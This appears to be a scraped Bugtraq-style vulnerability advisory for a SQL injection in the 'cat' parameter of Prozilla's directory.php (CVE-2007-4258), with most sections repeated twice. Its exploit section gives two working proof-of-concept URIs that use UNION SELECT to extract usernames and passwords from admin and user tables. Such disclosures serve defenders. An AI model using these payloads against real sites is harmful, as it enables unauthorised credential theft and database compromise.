Prozilla Cat Parameter SQL Injection Vulnerability
BID:25209
Info
Prozilla Cat Parameter SQL Injection Vulnerability
| Bugtraq ID: | 25209 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-4258 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 06 2007 12:00AM |
| Updated: | May 07 2015 05:36PM |
| Credit: | t0pP8uZz & xprog are credited with the discovery of this vulnerability. |
| Vulnerable: |
ProZIlla Prozilla 0 |
| Not Vulnerable: | |
Discussion
Prozilla Cat Parameter SQL Injection Vulnerability
Prozilla is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Prozilla is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Exploit / POC
Prozilla Cat Parameter SQL Injection Vulnerability
The following proof-of-concept URIs are available:
http://www.example.com/Script_Dir/directory.php?cat=-1/**/UNION/**/ALL%20SELECT/**/1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11,12,13,14/**/FROM/**/admin/*
http://www.example.com/Script_Dir/directory.php?cat=-1/**/UNION/**/ALL%20SELECT/**/1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11,12,13,14/**/FROM/**/users/*
The following proof-of-concept URIs are available:
http://www.example.com/Script_Dir/directory.php?cat=-1/**/UNION/**/ALL%20SELECT/**/1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11,12,13,14/**/FROM/**/admin/*
http://www.example.com/Script_Dir/directory.php?cat=-1/**/UNION/**/ALL%20SELECT/**/1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11,12,13,14/**/FROM/**/users/*
Solution / Fix
Prozilla Cat Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].